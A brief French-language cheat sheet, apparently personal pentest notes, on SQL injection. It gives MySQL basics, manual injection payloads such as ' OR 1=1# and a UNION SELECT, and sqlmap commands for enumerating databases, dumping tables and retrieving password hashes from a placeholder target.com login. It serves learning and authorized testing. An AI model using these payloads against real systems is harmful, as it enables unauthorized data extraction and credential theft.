SQL Injection
2026-03-13#sqli#mysql#sqlmap#web#exploitation
MySQL — Commandes de base
mysql -u root -p -- connexion SHOW DATABASES; -- lister les bases USE db_name; -- sélectionner une base SHOW TABLES; -- lister les tables INSERT INTO table_name (col1, col2, col3) VALUES (val1, val2, val3); -- insérer une entrée
Commentaires SQL
-- commentaire # commentaire /* commentaire */
Payloads manuels
' OR 1=1# ' OR '1'='1 FORD' UNION SELECT USER(),DATABASE(),VERSION(),4 #
SQLMap
Options principales
| Option | Description |
|---|---|
-u | URL cible |
--data | Données POST à envoyer |
-p | Champ à tester |
-D | Spécifier la base de données |
-T | Spécifier la table |
Exemple de base
sqlmap -u "https://target.com/login.php" \ --data="username=test&password=test" \ -p "username"
Reconnaissance
sqlmap [...] --current-user # utilisateur DB actif sqlmap [...] --current-db # base de données utilisée sqlmap [...] --dbs # lister toutes les bases sqlmap [...] --passwords # hashes des mots de passe utilisateurs
Extraction
sqlmap [...] -D db_name --tables # lister les tables sqlmap [...] -D db_name -T table --columns # lister les colonnes sqlmap [...] -D db_name -T table --dump # extraire les données